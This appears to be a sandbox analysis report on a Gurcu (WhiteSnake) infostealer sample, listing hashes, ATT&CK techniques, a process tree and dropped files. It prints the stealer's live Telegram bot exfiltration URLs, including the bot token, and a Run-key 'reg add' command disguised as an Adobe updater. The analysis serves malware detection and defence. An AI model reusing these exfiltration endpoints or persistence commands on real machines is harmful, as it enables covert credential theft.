gurcu | b8735a6c2caa10ed5e886a60be7f2a1edb55e5d26d60b24d24af5613a8a0e474

Analysis

max time kernel
148s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
08-12-2024 06:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

data.exe
Size

5.6MB
MD5

d650ccbec4cef66b790c0adbd0c690ed
SHA1

7c5323641a28170edb3121d9ad15d7bf643d801d
SHA256

b8735a6c2caa10ed5e886a60be7f2a1edb55e5d26d60b24d24af5613a8a0e474
SHA512

332dc8e1b3952ac3b3fbcfdf1634eaf9720d6bd85e6a1f0baef0f095c97a98d288f301b774c4d041c45ea8ea5ed8e52e8d786a874b8d0ce41dd5dd25a961b535
SSDEEP

98304:6W1l27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uc:6jOuK6mn9NzgMoYkSIvUcwti7TQlvciE

Score

10^/10

gurcu discovery persistence spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=2024893777

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Executes dropped EXE 1 IoCs

pid	Process
2516	conhost.exe

Loads dropped DLL 2 IoCs

pid	Process
3068	data.exe
2516	conhost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeUpdater\\conhost.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
3	raw.githubusercontent.com
6	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
4524	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	conhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	conhost.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1648	timeout.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2180	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
3068	data.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe
2516	conhost.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3068	data.exe
Token: SeDebugPrivilege	4524	tasklist.exe
Token: SeDebugPrivilege	2516	conhost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2516	conhost.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3068 wrote to memory of 5000	3068	data.exe	81
PID 3068 wrote to memory of 5000	3068	data.exe	81
PID 5000 wrote to memory of 4540	5000	cmd.exe	83
PID 5000 wrote to memory of 4540	5000	cmd.exe	83
PID 5000 wrote to memory of 4524	5000	cmd.exe	84
PID 5000 wrote to memory of 4524	5000	cmd.exe	84
PID 5000 wrote to memory of 876	5000	cmd.exe	85
PID 5000 wrote to memory of 876	5000	cmd.exe	85
PID 5000 wrote to memory of 1648	5000	cmd.exe	86
PID 5000 wrote to memory of 1648	5000	cmd.exe	86
PID 5000 wrote to memory of 2516	5000	cmd.exe	87
PID 5000 wrote to memory of 2516	5000	cmd.exe	87
PID 2516 wrote to memory of 3396	2516	conhost.exe	88
PID 2516 wrote to memory of 3396	2516	conhost.exe	88
PID 3396 wrote to memory of 2180	3396	cmd.exe	90
PID 3396 wrote to memory of 2180	3396	cmd.exe	90

C:\Users\Admin\AppData\Local\Temp\data.exe
"C:\Users\Admin\AppData\Local\Temp\data.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9BE2.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9BE2.tmp.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5000
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:4540
- - C:\Windows\system32\tasklist.exe
    Tasklist /fi "PID eq 3068"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4524
- - C:\Windows\system32\find.exe
    find ":"
    3⤵
    PID:876
- - C:\Windows\system32\timeout.exe
    Timeout /T 1 /Nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1648
- - C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe
    "C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2516
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3396
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Filesize
1.7MB

MD5
65ccd6ecb99899083d43f7c24eb8f869

SHA1
27037a9470cc5ed177c0b6688495f3a51996a023

SHA256
aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

SHA512
533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9BE2.tmp.bat

Filesize
269B

MD5
bcee8dd2c240eddf94607aae45351015

SHA1
31d5f15d4edca9fcb0932c70f6ac408c6f05c0a6

SHA256
f149622a1b281a6e4d8eee797043a603612abd40ca615037530524f3d52d04b7

SHA512
8efe491d343d9c4ec075df7b8213e5f6d268fff6ffa657bf6b13f3df798895e9850cfcfceaa533c3eef5e18f3f89dcf06628d416c97e71b1e02689f58eceec77

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe

Filesize
5.6MB

MD5
d650ccbec4cef66b790c0adbd0c690ed

SHA1
7c5323641a28170edb3121d9ad15d7bf643d801d

SHA256
b8735a6c2caa10ed5e886a60be7f2a1edb55e5d26d60b24d24af5613a8a0e474

SHA512
332dc8e1b3952ac3b3fbcfdf1634eaf9720d6bd85e6a1f0baef0f095c97a98d288f301b774c4d041c45ea8ea5ed8e52e8d786a874b8d0ce41dd5dd25a961b535

Download Submit
C:\Users\Admin\Desktop\ApproveUpdate.001

Filesize
750KB

MD5
1e9d6c698e51cc221d3d2e62c9901c9f

SHA1
c8a47d0dfbcd6d5b993cb4273a71dd584ae96a89

SHA256
258a376a9623a64fc0f61c9ba79682d87004016eb10ea586aa521ff0eb9c00cd

SHA512
89033aecb7c74a071027595d45e85e74ce615d4d268051e59b4721a33556ef95478945c33806bacdb26ebd1779f40cdd80623139bb79bdf5b420aa2ce5d62724

Download Submit
C:\Users\Admin\Desktop\CheckpointTest.ex_

Filesize
516KB

MD5
699d4497386982fce4e5b4298b94ec5f

SHA1
d205c4fd18f5a406662ee443adc66cb5a1a8600f

SHA256
b4abcea6a87ee0a4739d6d7d13d5de31057fc1174cd65e3152565c389dab7b8d

SHA512
7e099c34be50b1eb2300cc7e7fd05e287a943a5dbe51ada886be50703b96b1b338f86da376662070a8ae9170fdc850f619280b71d3f7cc75ab30c56f3926d3af

Download Submit
C:\Users\Admin\Desktop\DisconnectClose.exe

Filesize
379KB

MD5
5f6d4dee1e27b73da3c73adddf16f157

SHA1
378a84ee61f630b68c0530f594d824933b5d35a9

SHA256
c744e178d36088c66c7b666dee76ac67b21144b18049653ab8fe7067a953a6e4

SHA512
14408bb53ad38844e819331efc5d5a7f7a1272701ed4514fa800bb1d790eee75f8a9c3f7188858fdcec52f8157867d2fdd55287d3db7b58b51e4456f2d4cb29c

Download Submit
C:\Users\Admin\Desktop\DismountResize.mid

Filesize
496KB

MD5
fef6703f74a332d8bdd6537f47bc83c4

SHA1
d1e8f323ec7aa86f732824aef54126c219514ba1

SHA256
01722f727b4ac66f4f5a9718b89ac500d451a8983cd8289dd714a8fa7eed4c37

SHA512
59c01fd46b13cb651fa6460c931e53b5f28a8f888aae2a1134a7d05c40cc8bdb8e7624bdc33e67a184e12a72b3e4907c0917d6197a15a6707b7b1cd318b14ed1

Download Submit
C:\Users\Admin\Desktop\EnableInvoke.M2V

Filesize
457KB

MD5
ffb73f74c496d4a15c92e760fa8923db

SHA1
d992f950fa1d51243e969c76ea6a1ceb2b4c7df5

SHA256
117aba80e16d2ae3b8feed4ef50448aaf16ffc3940661f359a5a48c48c456260

SHA512
b182387efa23f718c821fb57c82f93b8921b7922093c4c85d87755b52e9eb4048f1286ec38bf84b81babaeed68277446c257d658e41cf4c9327faa5b44c9d7c8

Download Submit
C:\Users\Admin\Desktop\ExpandRemove.m1v

Filesize
711KB

MD5
0fd9068dd9009758a62fa44ba3f940a0

SHA1
78108d1bb74bb570461e2b32851a40be318a3d0f

SHA256
cd3f3a12ef308540052fff934576c8a02da2bfd6dfc692b4bb2d39f9efcb2171

SHA512
fd1e83950cc3a56bc4de3813194de9a3e112a5cd228ded00ddbe6afdbe46b87bca4ee4924d7cf6f27eb6afc68627804d696cad44da7ebb041b372a599457377f

Download Submit
C:\Users\Admin\Desktop\InitializeClear.ppsm

Filesize
321KB

MD5
f2871f3d5800342ed4e339eff91988e1

SHA1
6bec5459250c8a993dc735c44a83c3d407cc012d

SHA256
3dacc82caa70897780faf74f0df858778f8ec66b5d99cfe710734b307616a064

SHA512
3a61637fc153a8a77c2f0b8e967d69dc7939ee94ea49e2154a5e8fe258a039b670d8bd80e81bd5427179f0338ad466d5a871f1f831e8826ecc22ff817e44f241

Download Submit
C:\Users\Admin\Desktop\MergeConfirm.vsdx

Filesize
282KB

MD5
205417ff90f7735af6ad82b497fc248f

SHA1
f929663c8ff2c27a3595ed8ea387b25f49949229

SHA256
b80b3952ee86be060e625f5c669971b30179e6fc2272c44f8199e6192b479367

SHA512
2258c8f78cf93c9ee474f08082302a8e3481799b1bd38f224dcc505390d7581d0fba9210c791552a5f5ecc0ca1f015b69bf0108318092f59176884ec12411133

Download Submit
C:\Users\Admin\Desktop\MergeRegister.pcx

Filesize
613KB

MD5
cba577c8ea75c507f1f1086508378751

SHA1
b893ce44ddbbbca554469d28d66fd7e231cd3b7e

SHA256
7ce0dc9db31ad570480bf9d029f199eb6ade5ae0febb8fd1de5ac7f45200e945

SHA512
c59b99b3ca2ae593192ac91e3d79a54c3fb86871c2bcbb8e55bf56dfc2a670ce87e0780d18a553906f1be5458d38e78487f623d19eb8f3ad6f57669b0f66b1d7

Download Submit
C:\Users\Admin\Desktop\MergeUse.ocx

Filesize
633KB

MD5
846da7dcbae3636408fcf8c82ca2e7c2

SHA1
85003bf1b996e1cbba838258b64a4da13e3187ed

SHA256
c3b42ebdec3c73bf493008df7cd7c8ac959c4cc8a3c38d88d1a39d4ba33aba47

SHA512
8ddaec35660c3cbbf57f4874b048e4377eea6616eafc8275da29c1f60822b8739348199957be4a3bf698c5d4362390aa6182f308b45a17a0343eb6b60fe9e9f3

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk

Filesize
2KB

MD5
ada9746e569f453383c616bf23096030

SHA1
b7e85ddf0d7c74b093444d51dff218a2e9d6ea8b

SHA256
005638ac0ceafccf7e251981468a3c471d221f5a5b6f265039e810cce195259a

SHA512
16ba86fbf584c5829e70d35f4d5a379fa65da978ddac22e97ae8592a6c522c3ba5fc41eb468822aa1018d1e362e5cde0b5542b2bee0fdd405861c31748c6bdc6

Download Submit
C:\Users\Admin\Desktop\PingInstall.html

Filesize
360KB

MD5
f829544acbda84e204575671f2db62cc

SHA1
40dc245bba964806a99a998b0ee25f8c2e8446e7

SHA256
78811276774b8ecc184029ad44764488acae18d23b545e0cc2d41a95de0dbd11

SHA512
2ec6995f0f7ab6b83d3029706f8aea86a53886475449a2acbec81e2d439c265575b92a0909c087677d0604e48936a6e3bb2686bf3c58aa2a45c7a699704eadf2

Download Submit
C:\Users\Admin\Desktop\ProtectLock.snd

Filesize
691KB

MD5
b745b205327d124cecc8d5864eefaa94

SHA1
8dcb82a2735c27bfde7e662fa0c490c4d9531d0c

SHA256
65de549c1772c29967f5116c4fee26bd4431d480329e6aad1ef0d50faedeba08

SHA512
5efcad37f17988540a6e4926968c67df1d4ccb6220b5838fd8f05a583f9932252596e6608bfa2f4412cfc528f1f593deec6fe5f12ae69bac8f716de8c7658c77

Download Submit
C:\Users\Admin\Desktop\ProtectWrite.avi

Filesize
477KB

MD5
c37b12fa6aaa6c3c4ef9562716e50c70

SHA1
d68aefef4502ccde44d6bdb9455697e83c3f0a64

SHA256
f30d02027ff9b23a78b9cdb9b51cae333c86e6402d925e185b152df0bcd5946a

SHA512
1e910e535a4ba90149c4237e3925b3ddc56132331b658207abf25bc8bd726c9a28a5baa085ab4b9d835a96150e31b8e187c7111d1b5263093154d8c681b2bb52

Download Submit
C:\Users\Admin\Desktop\PushPublish.wmf

Filesize
652KB

MD5
694b55cffb320891cbf0bd6ae0685744

SHA1
21136caf30782332814f6b5d703c4ce11fd1c470

SHA256
7ec57ad66c4a9b38630d06e1b6ca5545b018bc319bb7726f8d58e763dff6677d

SHA512
f7788dd24c5a628b86167fe64212c47bfc5a04679da558c6005a5199008490bbe7cb84ff367f6ccd6922f30547afd3936c6e3f64a8e391ae50d451f2990b8e2c

Download Submit
C:\Users\Admin\Desktop\ReadProtect.vsx

Filesize
574KB

MD5
0529be7fbfb4f2fcf3fd9e36a8f09272

SHA1
77137a7573b32ced5df581ab86d38e2dedf41ece

SHA256
6ee40fca527cc0986218a63e91d3da0c5e02bbd85ecf8ba50d11d4c74802b4c5

SHA512
8ee70d25f1b636e12e0765f6ce9173accd1b88afb01f92e9943bc2c2e330a435e3cc8d1c99f45aabca8ebfb57dc812904a411f4b5cf766eef516e9107c827a6a

Download Submit
C:\Users\Admin\Desktop\RedoProtect.m1v

Filesize
340KB

MD5
be6f3e2e876a4b20a17f4d4013337fd5

SHA1
6dd56b768b03e6ec9c856475b1dcaefd80fff9ed

SHA256
edee7a367d1629602e2ddaf7bfaf9663bfaa770e104b1d35fdc568c141109c00

SHA512
f96a341d11905ba93de1761725638d1fd7ad513ee5db6229a3a5192aad4a2200d178ad52eb2d24a010d2c98bdece60778b537e9b1d4ffadef60401d4c0a6fffe

Download Submit
C:\Users\Admin\Desktop\RepairAssert.xlsx

Filesize
12KB

MD5
fe134e00bd1b84fe4d80a5a04635ac0a

SHA1
3716d6a8a72b438fabc1f722d54885e8f0b4d1e9

SHA256
0f1e1bef3fc699aec180d00d17d1f0cd12774c09bb9762062f4e850c5d751203

SHA512
0eb22978cbe68da5458147bb7647949f1021b08e8a6fcc0e545d9ee6e61964a81c57c17309dcf3ca529c4a028f0b4873c73a66269592c44671322d59ac565e32

Download Submit
C:\Users\Admin\Desktop\ResetFormat.jpg

Filesize
769KB

MD5
f36bf612345012a7886568fc4a0a3db6

SHA1
ed12eaa4f26e2d9e891beb8b5b0a8ed21680da38

SHA256
06aea5a30a9b081b5278d72178ee21940323643eb87809385345b1ff866846a6

SHA512
a473315f538ea2ed21ee8ba03f576d3b5e61632e71d7d28c50e587a18321d1158f8906f7ac99644663ed6a556c0f38645a7b0635312ef26692698e86a281e56c

Download Submit
C:\Users\Admin\Desktop\ResetGet.cab

Filesize
418KB

MD5
7453401197188d1d70e14d532ac5a29b

SHA1
0b52bb2c983e14ca1c4d9afc112dc70e179fa193

SHA256
081fb111f75c8938887643bdca777bb784b7a95ccdf424f744213ec9ff5e78e2

SHA512
aa5d623c3a6bc6f15eeb1b608a8a4d15d4c75df86582ca9a818cdc71611a0a947dc60f824414dc885292fcbeca5ac4d5d7a5bc693aa7e7f6402068df347fe132

Download Submit
C:\Users\Admin\Desktop\ResizeStop.aiff

Filesize
535KB

MD5
8089182aae8ca0556c2758c2640359b6

SHA1
74b0f8ee98d45044b8aa425c3056c6359edb2986

SHA256
5ce473adc69e8fca1a0cf709f75c6b3ba1d0d36720ce90401a762c6ff6b5ecd1

SHA512
59b609cd802fca310eb95b035ec8684325ed16a71d90ab63afcbd77ac276cedd02e9ca8a5e026180c6e0dc6ae01dda944145210a2b1acc88811cdd029a355cf8

Download Submit
C:\Users\Admin\Desktop\ResizeSwitch.asp

Filesize
808KB

MD5
e50f7b0a74554013ab286561300041c9

SHA1
6a60ffcc1cebffac1e9baca33cfe68829428c6bd

SHA256
49099c3f0cd0d1b8dfdd8932384e38e54dcecf62fbc5f194c059af9a2500766a

SHA512
38bab78912bda29a83d8f29d864b6a60b648398ca8feaae8e12f7f49a6b77f3096bcb4a685a90aa83edce286ca768ff2c07e0723ec17a418f9727faf540a3b3b

Download Submit
C:\Users\Admin\Desktop\ResumeCheckpoint.pps

Filesize
555KB

MD5
7c111d2ab154158f13e7f0dfe34b6b21

SHA1
8f62a49f0c994b5dbe2a54072f0a0a63abd492fe

SHA256
dc1411481ceadf30fbf11d1b3ee80f9c1924df7d3b8c3fc889904486b36d2dff

SHA512
44e752646fac5ec3f9936ed838187ccacec06433b9807bf0c5514414f199d06703ddf7c0218e3173faf2d3498fbdb93f9c756b965f45d3e6d8137b32d974a9e0

Download Submit
C:\Users\Admin\Desktop\TestDisable.docm

Filesize
730KB

MD5
2bf9ef35bcec1945e0a86f17f53f0b54

SHA1
b0acb587775ad01dab9f77b4fc44ea29cb4be316

SHA256
c6c388b28c9cfcc3dc1640050316655946a93ebdef1c50c0c2174c8658659d0d

SHA512
b4d54ab774c7eb227f7faa2548ccfb948b34ca14fc34b457ff4c9d8029d857aa53671f5097e3e70a62b1d83c3da065fdd3b536f2a1e976e8c54902620b846004

Download Submit
C:\Users\Admin\Desktop\TestRepair.xlsx

Filesize
9KB

MD5
d53a121cf35f36b451e6a2a5e0f4414e

SHA1
38b30679587cb7f2010ba93abd3c43b9894b5022

SHA256
0ccd44dfc5d6cf83d5cd64e4180d09df0d8bacc9bde08e1bc21ce706c6a29504

SHA512
09d32898cbc4a4771ac1f2d3f43267f90db42144bc1a58158a1b5536cd256a50486ddb0040666530e71d14f73f44572a9f709543b314807064fa3870a2a20b92

Download Submit
C:\Users\Admin\Desktop\TestUnprotect.sql

Filesize
399KB

MD5
0a43e7a9ddbf261967336f892f415864

SHA1
8fcadbf1b0c6856f43490a5fbb62de1e84f9be6e

SHA256
6a32db266d2dbbd5021384ab20aa0c19f8f23d49197314caf87538a99da690fc

SHA512
b74e3c74793db032eefed65df9806143171e6cddb288cc94475d7e337dbc869efa73118224dcda59ad27df89f6becb1818ebe280b8204c7aafb7ee16749c9777

Download Submit
C:\Users\Admin\Desktop\UnregisterDebug.xps

Filesize
301KB

MD5
a75f4b17f15c44493a623d4eabc75d30

SHA1
20ff2ea5ef2b04e5a019721fd0095bf2248a5dfb

SHA256
98cd9b812426fe82b034e987d0eb9dbff168c5e93055f48cd348ef1262cfc49c

SHA512
185e417ace6ba770bd4357a88145351ad72f6c05bde636d0e16cf95873ca2531b58ac794ff95c17313222ef2a56f5847d8b7bbb371cac5de06246a45cf8d59bb

Download Submit
C:\Users\Admin\Desktop\UseBlock.docm

Filesize
594KB

MD5
4b791db06e4f02e6e47581a5c5122ab8

SHA1
14a260289531f7ad6cd3dc99c8add5abaa3dc02d

SHA256
b45cc3cc4246fa7f8db1dced926e029d132b077739f54d42ad9cff4b073c6dbe

SHA512
35096b6fb008ce9e7b875f4906abd3e03b2925b36f3343308a174ff77292ae944d873cd351f42661f360ebc76816107ec2934bbb71eda32d26e73c0edc5e4ed0

Download Submit
C:\Users\Admin\Desktop\UseExit.mp4

Filesize
438KB

MD5
83f8badc65855b7167f23547bf697f12

SHA1
68ca83617c993f0db5f29fb0fe409e37a6c49ec0

SHA256
9e77c4b912ee3a685ac11c7b5f266bbc64ddcbcd7221f69a43f6b307867e7cdd

SHA512
d16c7355a290607c06b8d2ad30fa0f1742dfd45e9995f5e3b9c1c03e9a2e7a205345080ad17e0dd980e760cc2cd5908c7efa7646c9902c5bcbad5e7f3dad81ef

Download Submit
C:\Users\Admin\Desktop\UseMove.mov

Filesize
788KB

MD5
874bb51de72717b2f6589c312ad8c803

SHA1
b9b23ea2534a8520e925d7e157454fcea370b18a

SHA256
4d4a7cf907595076e95f32d82661f858fd89e9bb21c41f1b74ff053841e0f79c

SHA512
548948dbbe2349fecc8f3750aca15d2bfd2f7f87a578d6123eb035cb5adad45a9f3131efab8e4886deac69902c348aaab175d152bf56218c29ee0730156d8200

Download Submit
C:\Users\Admin\Desktop\WaitMerge.dll

Filesize
1.1MB

MD5
9d3b09c233d61e5b65118ccf238ac69e

SHA1
a9b4a7bf24ba37ae0eb0e227b786c629d5e1014e

SHA256
008f46f84e561c14f4071f0081c9ea26527aefad970871361362e9af4b33df8e

SHA512
3bb72af047cd6108cca030fe0f22597b72201967504cec84a3a51888c973724b331b0bd03168b7ceb79df2f3572124c3ac36d76c34435c90fa96e6d7a1d7ac8f

Download Submit
C:\Users\Admin\Desktop\WriteClose.cab

Filesize
672KB

MD5
9b72d60c25bf40a69f399f15fe551e9c

SHA1
c108f7243079d89f5a5211cd6664073517791a1e

SHA256
d29196fefc9b0ff05a2ccf36b9c15c56468ae19ff0b54c64ef9ba1542c0d7fc3

SHA512
3e089668a74f98e638183d6682e4cc39d81a3d62c4a996cf75162baab2d3813fb27500a04d75df9999c7e875996b72cbc373da5b199fbd1e74edb9e2da4f941a

Download Submit
C:\Users\Public\Desktop\Acrobat Reader DC.lnk

Filesize
2KB

MD5
b979e728e3c8b757e0ab2d91767dba76

SHA1
2cb3b62e6d2c3580216a24312b065a1c63daa3db

SHA256
faf2d57cf38f664296af94f8697b3781242f0155fcd34c18fcbec934f400adf1

SHA512
357f3e8b5c6c970ffec3877154fec57ad728d94ae9e5f982608193f0b7d7608d9b04958fac2f7c183f6e8c060179fd690ef2fd1d7b21cbb7a4066697f3278855

Download Submit
C:\Users\Public\Desktop\Firefox.lnk

Filesize
1000B

MD5
2bf0e8c47f1da45d29b260f4f99e2da3

SHA1
dfd610d38e8e2c516b0a570021d4469c14058c5d

SHA256
414a1d94d6aa85cadb4c086fbfde622d0de1f7235e74e7b44735cfd8c6ed1292

SHA512
3c427f118e365bc7ed9f475718a326dc6a4a448a1c30e9b0672657ae84a02e403eada0f90ced703e30f4f9fa2b68821c5e3945a509b9562d892019d26d83ef3b

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk

Filesize
2KB

MD5
70bf538ac1534853d505e2702412a02b

SHA1
ed5be82d5dfba6f5e6dfcb0c901be456f3949f9d

SHA256
f26e182649d01837b6ef19169ae3bf434933d4a7585c7f80dfb81eb85eb0ef27

SHA512
32be95b110a757282bf522a67657f752a9281a938e721a69733d6f68b201ba12fb25762a2336889a45025b12c920f5c63c429cac9975a92cbba365915e41cfda

Download Submit
C:\Users\Public\Desktop\VLC media player.lnk

Filesize
923B

MD5
528e94aeee35cc809ca363040028c5a2

SHA1
c974a7434e91c1df17d451c0109fb33442c37543

SHA256
966e2837c4066e7c05d016f4cffae35b121a1a55e31452939c7d068658317b63

SHA512
e160ec0b77303c8b40c5efe88d9023dea9e91aaab59598daea6a34b78d60f4a60638ecc8034f56c6908f8741656d030066d2b057b4f3a7d311ef69db85e49ff7

Download Submit
memory/2516-22-0x000001F56AE40000-0x000001F56AEF2000-memory.dmp

Filesize
712KB

Download
memory/2516-27-0x000001F56AFC0000-0x000001F56AFE6000-memory.dmp

Filesize
152KB

Download
memory/2516-24-0x000001F56AF90000-0x000001F56AFB2000-memory.dmp

Filesize
136KB

Download
memory/2516-23-0x000001F56AF40000-0x000001F56AF90000-memory.dmp

Filesize
320KB

Download
memory/2516-26-0x000001F56BC10000-0x000001F56BC4A000-memory.dmp

Filesize
232KB

Download
memory/2516-20-0x000001F56ABD0000-0x000001F56AC3A000-memory.dmp

Filesize
424KB

Download
memory/2516-47-0x000001F56BF80000-0x000001F56BF92000-memory.dmp

Filesize
72KB

Download
memory/2516-28-0x000001F56BC50000-0x000001F56BF7E000-memory.dmp

Filesize
3.2MB

Download
memory/3068-9-0x0000021C717A0000-0x0000021C717AA000-memory.dmp

Filesize
40KB

Download
memory/3068-6-0x0000021C71800000-0x0000021C71876000-memory.dmp

Filesize
472KB

Download
memory/3068-1-0x0000021C6F450000-0x0000021C6F9F2000-memory.dmp

Filesize
5.6MB

Download
memory/3068-7-0x00007FFC85050000-0x00007FFC85B12000-memory.dmp

Filesize
10.8MB

Download
memory/3068-8-0x0000021C71780000-0x0000021C7179E000-memory.dmp

Filesize
120KB

Download
memory/3068-14-0x00007FFC85050000-0x00007FFC85B12000-memory.dmp

Filesize
10.8MB

Download
memory/3068-0-0x00007FFC85053000-0x00007FFC85055000-memory.dmp

Filesize
8KB

Download